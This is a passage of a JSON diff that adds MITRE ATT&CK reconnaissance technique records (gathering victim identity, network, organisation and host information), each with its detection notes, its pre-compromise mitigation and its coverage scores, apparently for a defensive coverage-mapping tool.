Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1589.002", + "name": "Gather Victim Identity Information: Email Addresses", + "url": "https://attack.mitre.org/techniques/T1589/002", + "description": "Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.\n\nAdversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1589.003", + "name": "Gather Victim Identity Information: Employee Names", + "url": "https://attack.mitre.org/techniques/T1589/003", + "description": "Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.\n\nAdversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "cumulative_score": 0.0656047619047619, + "adjusted_score": 0.0656047619047619, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1590", + "name": "Gather Victim Network Information", + "description": "Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "url": "https://attack.mitre.org/techniques/T1590", + "tactics": [ + "Reconnaissance" + ], + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "platforms": [ + "PRE" + ], + "data_sources": [], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1590.001", + "name": "Gather Victim Network Information: Domain Properties", + "url": "https://attack.mitre.org/techniques/T1590/001", + "description": "Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1590.002", + "name": "Gather Victim Network Information: DNS", + "url": "https://attack.mitre.org/techniques/T1590/002", + "description": "Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.\n\nAdversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1590.003", + "name": "Gather Victim Network Information: Network Trust Dependencies", + "url": "https://attack.mitre.org/techniques/T1590/003", + "description": "Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1590.004", + "name": "Gather Victim Network Information: Network Topology", + "url": "https://attack.mitre.org/techniques/T1590/004", + "description": "Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1590.005", + "name": "Gather Victim Network Information: IP Addresses", + "url": "https://attack.mitre.org/techniques/T1590/005", + "description": "Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1590.006", + "name": "Gather Victim Network Information: Network Security Appliances", + "url": "https://attack.mitre.org/techniques/T1590/006", + "description": "Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "cumulative_score": 0.06904761904761905, + "adjusted_score": 0.06904761904761905, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "18.2,18.3" + ], + "nist_controls": [], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1591", + "name": "Gather Victim Org Information", + "description": "Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "url": "https://attack.mitre.org/techniques/T1591", + "tactics": [ + "Reconnaissance" + ], + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "platforms": [ + "PRE" + ], + "data_sources": [], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1591.001", + "name": "Gather Victim Org Information: Determine Physical Locations", + "url": "https://attack.mitre.org/techniques/T1591/001", + "description": "Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1591.002", + "name": "Gather Victim Org Information: Business Relationships", + "url": "https://attack.mitre.org/techniques/T1591/002", + "description": "Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1591.003", + "name": "Gather Victim Org Information: Identify Business Tempo", + "url": "https://attack.mitre.org/techniques/T1591/003", + "description": "Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1591.004", + "name": "Gather Victim Org Information: Identify Roles", + "url": "https://attack.mitre.org/techniques/T1591/004", + "description": "Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "cumulative_score": 0.05, + "adjusted_score": 0.05, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1592", + "name": "Gather Victim Host Information", + "description": "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "url": "https://attack.mitre.org/techniques/T1592", + "tactics": [ + "Reconnaissance" + ], + "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "platforms": [ + "PRE" + ], + "data_sources": [ + "Internet Scan: Response Content" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1592.001", + "name": "Gather Victim Host Information: Hardware", + "url": "https://attack.mitre.org/techniques/T1592/001", + "description": "Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).", + "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1592.002", + "name": "Gather Victim Host Information: Software", + "url": "https://attack.mitre.org/techniques/T1592/002", + "description": "Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host software information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1592.003", + "name": "Gather Victim Host Information: Firmware", + "url": "https://attack.mitre.org/techniques/T1592/003", + "description": "Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop 